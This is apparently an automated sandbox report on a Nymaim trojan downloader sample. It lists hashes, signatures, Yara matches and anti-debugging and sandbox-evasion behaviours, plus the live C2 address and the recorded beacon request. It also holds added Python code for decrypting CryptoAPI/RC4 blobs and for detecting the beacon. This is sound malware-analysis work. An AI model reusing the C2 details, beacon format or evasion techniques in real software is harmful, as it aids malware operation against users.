Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1565613
MD5: 97e06acdd95db30f5421cd163f25ec93
SHA1: fc2e75139c5d25a46c3fa0e7a0ebe032dca3519a
SHA256: df1e3b3a4009381af205e8b587bb0f8b199793968dacc09822091a5c218a3002
Tags: exe, user-Bitsight

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Nymaim
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7520 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 97E06ACDD95DB30F5421CD163F25EC93)
  • cleanup
Name: Nymaim
Description: Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

Malware configuration (Nymaim): {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Yara matches in memory dumps (Source | Rule | Description | Author | Strings):
00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security
00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.1670201728.0000000004A30000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security
00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security
00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x8436:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Yara matches in unpacked PE files (Source | Rule | Description | Author | Strings):
0.2.file.exe.4940e67.1.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security
0.2.file.exe.400000.0.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security
0.3.file.exe.4a30000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security
0.2.file.exe.400000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security

Note that the Smokeloader and RedLineStealer rules each matched on a single short code-sequence string ($a), while every Nymaim rule and the configuration extractor agree on Nymaim; treat the two cross-family hits as low-confidence unless the unpacked code is inspected.

No Sigma rule has matched
No Suricata rule has matched

                AV Detection

Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub#h | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubU&Fi | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubw5Tp$ | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub;b | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-b6 | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub- | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubj% | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubN%Ch | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubSh | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKc | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKb | Avira URL Cloud: Label: malware
Source: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub79-;c | Avira URL Cloud: Label: malware
Source: 0.3.file.exe.4a30000.0.raw.unpack | Malware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
Source: file.exe | ReversingLabs: Detection: 31%
Source: file.exe | Virustotal: Detection: 44%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004035D0 CryptAcquireContextW, CryptCreateHash, CryptHashData, GetLastError, CryptDeriveKey, GetLastError, CryptReleaseContext, CryptDecrypt, CryptDestroyKey
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04943837 CryptAcquireContextW, CryptCreateHash, CryptHashData, GetLastError, CryptDeriveKey, GetLastError, CryptReleaseContext, CryptDecrypt, CryptDestroyKey
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
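The two code functions above chain CryptAcquireContextW, CryptCreateHash, CryptHashData, CryptDeriveKey and CryptDecrypt: the key is derived from a hashed string rather than generated at random, so whoever recovers that string can decrypt the same data offline. The following is an added example, not code from the report or from the sample: a stand-alone re-implementation of the documented CryptDeriveKey rule together with RC4, usable on a blob dumped from the process. The MD5/RC4 pairing, the password and the payload are assumptions made for the example; the report lists the API calls but not the ALG_ID values, so confirm the CryptCreateHash and CryptDeriveKey arguments in the trace before reusing it.

```python
"""Offline re-implementation of the CryptoAPI call chain recorded above
(CryptCreateHash -> CryptHashData -> CryptDeriveKey -> CryptDecrypt).
The derivation rule is the one documented for CryptDeriveKey; the
MD5 + RC4 pairing, the password and the blob are assumptions for this
example, since the report does not show the ALG_IDs."""
import hashlib


def crypt_derive_key(hash_name, password, key_len):
    """CryptDeriveKey: the key is the password's digest truncated to key_len.
    When more bytes are needed than the digest provides, the digest is
    XORed into 64-byte 0x36 and 0x5C buffers, each is hashed again, and
    the two results are concatenated."""
    digest = hashlib.new(hash_name, password).digest()
    if key_len <= len(digest):
        return digest[:key_len]
    inner = bytes(b ^ 0x36 for b in digest.ljust(64, b"\0"))
    outer = bytes(b ^ 0x5C for b in digest.ljust(64, b"\0"))
    expanded = (hashlib.new(hash_name, inner).digest()
                + hashlib.new(hash_name, outer).digest())
    return expanded[:key_len]


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def cryptoapi_rc4_decrypt(password, blob, hash_name="md5", key_bits=128,
                          base_provider=False):
    """Mirror of the sample's call chain for an RC4 key.  The Enhanced
    Provider named in the report hands out 128-bit RC4 keys by default.
    The Base Provider only issues 40-bit keys, and CryptoAPI pads those
    with 11 zero 'salt' bytes before keying RC4; a re-implementation that
    forgets the padding produces garbage."""
    key = crypt_derive_key(hash_name, password, key_bits // 8)
    if base_provider and key_bits == 40:
        key += b"\0" * 11
    return rc4(key, blob)


# Constructed data: a made-up password and a made-up config string,
# encrypted here with the same routine so the round trip can be checked.
PASSWORD = b"example-password"                      # assumption, not from the sample
PLAINTEXT = b'{"C2 addresses": ["198.51.100.7"]}'   # constructed payload
BLOB = rc4(crypt_derive_key("md5", PASSWORD, 16), PLAINTEXT)

if __name__ == "__main__":
    print(cryptoapi_rc4_decrypt(PASSWORD, BLOB).decode())
```

The hash algorithm and key length come from the CALG_* constants passed to CryptCreateHash and CryptDeriveKey; read them from the call arguments in the trace rather than guessing, and remember that the upper 16 bits of the CryptDeriveKey flags can override the provider's default key length.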

                Networking

Source: Malware configuration extractor | IPs: 185.156.72.65 (listed 4 times in the configuration)
Source: Joe Sandbox View | IP Address: 185.156.72.65
Source: Joe Sandbox View | ASN Name: ITDELUXE-ASRU
Source: unknown | TCP traffic detected without corresponding DNS query: 185.156.72.65 (50 connections)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401970 HttpAddRequestHeadersA, InternetSetFilePointer, InternetReadFile, HttpQueryInfoA, CoCreateInstance
Source: global traffic | HTTP traffic detected (12 identical requests):
  GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
  User-Agent: 1
  Host: 185.156.72.65
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub#h
Source: file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-
Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub-b6
Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub79-;c
Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub;b
Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKb
Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubKc
Source: file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubN%Ch
Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubSh
Source: file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubU&Fi
Source: file.exe, 00000000.00000002.4109269730.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubj%
Source: file.exe, 00000000.00000002.4110885512.0000000005270000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubkb
Source: file.exe, 00000000.00000002.4109269730.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubw5Tp$
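The traffic above goes straight to 185.156.72.65 with no DNS lookup, carries a User-Agent of "1", and repeats the same /add?substr=...&s=...&sub=... request a dozen times, yet no Suricata rule fired. The following is an added example, not code from the report or from Joe Sandbox: a small detector that walks captured DNS answers and HTTP requests in order and flags exactly those traits. The DNS answer and the benign request are constructed; only the beacon request copies the headers recorded above. The repeat threshold and the "short or numeric User-Agent" rule are choices made for the example.

```python
"""Flag the check-in traffic this report records: repeated GETs to a bare IP
that no DNS answer returned, a one-character User-Agent and a fixed URI.
Runs offline over a constructed event list; only the beacon request below
copies the headers shown in the report."""
import ipaddress
import re
from collections import Counter

# Shape of the sample's check-in URI, taken from the requests in the report.
CHECKIN_URI = re.compile(r"^/add\?substr=[^&]+&s=[^&]+&sub=[^&]+$")
REPEAT_THRESHOLD = 3        # identical requests before we call it polling


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, URI and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, uri, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "uri": uri, "headers": headers}


def is_bare_ip(host):
    """True when the Host header carries a literal IP instead of a name."""
    try:
        ipaddress.ip_address(host.rsplit(":", 1)[0].strip("[]"))
        return True
    except ValueError:
        return False


def score_request(req, dst_ip, resolved):
    """Return the reasons a single request looks like the sample's beacon."""
    reasons = []
    headers = req["headers"]
    if is_bare_ip(headers.get("host", "")):
        reasons.append("Host header is a bare IP address")
    if dst_ip not in resolved:
        reasons.append("destination never returned by a DNS answer")
    ua = headers.get("user-agent", "")
    if ua.isdigit() or len(ua) < 8:
        reasons.append("degenerate User-Agent %r" % ua)
    if CHECKIN_URI.match(req["uri"]):
        reasons.append("URI matches the /add?substr=...&s=...&sub=... check-in")
    return reasons


def analyze(events):
    """events are ('dns', name, [answer IPs]) or ('http', dst_ip, raw request)
    in capture order.  Returns {dst_ip: set of reasons} for flagged hosts."""
    resolved, flagged, seen = set(), {}, Counter()
    for event in events:
        if event[0] == "dns":
            resolved.update(event[2])
            continue
        _, dst, raw = event
        req = parse_request(raw)
        reasons = score_request(req, dst, resolved)
        seen[(dst, req["uri"])] += 1
        if seen[(dst, req["uri"])] == REPEAT_THRESHOLD:
            reasons.append("same request repeated %d+ times" % REPEAT_THRESHOLD)
        if reasons:
            flagged.setdefault(dst, set()).update(reasons)
    return flagged


# Beacon request as recorded in the report (Accept header abbreviated).
BEACON = ("GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1\r\n"
          "Accept: text/html, application/xml;q=0.9, */*;q=0.1\r\n"
          "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\n"
          "User-Agent: 1\r\nHost: 185.156.72.65\r\nConnection: Keep-Alive\r\n\r\n")
# Constructed benign traffic: a resolved name and an ordinary browser request.
BENIGN = ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
          "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n\r\n")
EVENTS = [("dns", "www.example.com", ["203.0.113.10"]),
          ("http", "203.0.113.10", BENIGN)] + [("http", "185.156.72.65", BEACON)] * 4

if __name__ == "__main__":
    for host, reasons in analyze(EVENTS).items():
        print(host, sorted(reasons))
```

The "no DNS answer" check is only sound when the capture starts before the process does and includes the resolver traffic; on a host with a long-lived DNS cache, seed `resolved` from the cache or the check will flag legitimate connections too.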

                E-Banking Fraud

Source: Yara match | File source: 0.2.file.exe.4940e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.4a30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1670201728.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                System Summary

Source: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00410940
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041A346
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040EBC7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00403D40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00415E59
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040B6D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402EE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404F70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040EF09
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041572E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E507D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D483A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00477837
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F4CAF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D2D71
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E0169
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B990D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005E2997
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004739B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005909AA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005DB20F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D62D5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005C9717
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D97F2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00515FB1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_049451D7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0494EE2E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04943FA7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04955995
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0494B937
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0494F170
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04950BA7
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0040A7A0 appears 35 times
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 0494AA07 appears 34 times
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: file.exe | Static PE information: Section: (blank) ZLIB complexity 0.9942525875796179
Source: file.exe | Static PE information: Section: zeyoifdy ZLIB complexity 0.9922996438720489
Source: file.exe | Static PE information: Entry point disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5, instruction diversity: 0.5
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A50 VirtualProtect, GetLastError, FormatMessageA, LocalAlloc, OutputDebugStringA, LocalFree, LocalFree, LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04798464 CreateToolhelp32Snapshot, Module32First
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00401970 HttpAddRequestHeadersA, InternetSetFilePointer, InternetReadFile, HttpQueryInfoA, CoCreateInstance
Source: C:\Users\user\Desktop\file.exe | Command line argument: nosub (0_2_004087E0)
Source: C:\Users\user\Desktop\file.exe | Command line argument: mixtwo (0_2_004087E0)
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 31%
Source: file.exe | Virustotal: Detection: 44%
Source: file.exe | String found in binary or memory: /add?substr=
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 2028032 > 1048576
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe | Static PE information: Raw size of zeyoifdy is bigger than: 0x100000 < 0x1ace00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.400000.0.unpack, section rights (blank):EW; .rsrc:W; .idata:W; (blank):EW; zeyoifdy:EW; tiucznkd:EW; .taggant:EW; vs .text:ER; .rdata:R; .data:W; .rsrc:R; .reloc:R
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1fa19c should be: 0x1f6a0c
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (blank)
Source: file.exe | Static PE information: section name: zeyoifdy
Source: file.exe | Static PE information: section name: tiucznkd
Source: file.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A237 push ecx; ret 0_2_0040A24A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421B7D push esi; ret 0_2_00421B86
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F907E push eax; mov dword ptr [esp], 7C0A1800h0_2_005F9716
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FA02B push 2FE5EA4Ah; mov dword ptr [esp], edx0_2_006FA04C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066002A push edi; mov dword ptr [esp], 7FF67FE6h0_2_0066004E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8038 push edi; mov dword ptr [esp], 64604D33h0_2_005F896F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8038 push eax; mov dword ptr [esp], 048AF376h0_2_005F8988
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8038 push eax; mov dword ptr [esp], 7C0A1800h0_2_005F9716
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062E819 push esi; mov dword ptr [esp], edi0_2_0062E851
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0062E819 push 6395451Bh; mov dword ptr [esp], eax0_2_0062E878
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006860E1 push edi; mov dword ptr [esp], ebp0_2_006861C3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061C0FE push edi; ret 0_2_0061C10D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BB8B3 push edi; mov dword ptr [esp], ebp0_2_006BB89B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BB8B3 push 175DBF00h; mov dword ptr [esp], ecx0_2_006BB940
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BB8B3 push ecx; mov dword ptr [esp], edi0_2_006BB99B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005FB8B2 push cs; ret 0_2_005FB8C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00678965 push esi; mov dword ptr [esp], ebx0_2_00678984
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00678965 push 2B048274h; mov dword ptr [esp], ebx0_2_006789B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8144 push esp; retf 0_2_005F8145
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061B950 push eax; mov dword ptr [esp], edx0_2_0061B966
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061B950 push edi; mov dword ptr [esp], ecx0_2_0061B999
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8968 push edi; mov dword ptr [esp], 64604D33h0_2_005F896F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8968 push eax; mov dword ptr [esp], 048AF376h0_2_005F8988
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005F8968 push eax; mov dword ptr [esp], 7C0A1800h0_2_005F9716
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0061C159 push edx; ret 0_2_0061C168
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00697139 push eax; mov dword ptr [esp], ebx0_2_00697158
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0065A9E3 push edx; mov dword ptr [esp], ebp0_2_0065AA0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C09C5 push eax; mov dword ptr [esp], ebp0_2_006C0945
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006259BB push edx; mov dword ptr [esp], 4643DAE7h0_2_00625A6E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006259BB push 47D61941h; mov dword ptr [esp], edi0_2_00625A8E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006259BB push 3B4C854Dh; mov dword ptr [esp], esi0_2_00625AE2
                Source: file.exeStatic PE information: section name: entropy: 7.933330547933749
                Source: file.exeStatic PE information: section name: zeyoifdy entropy: 7.949718189685727

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
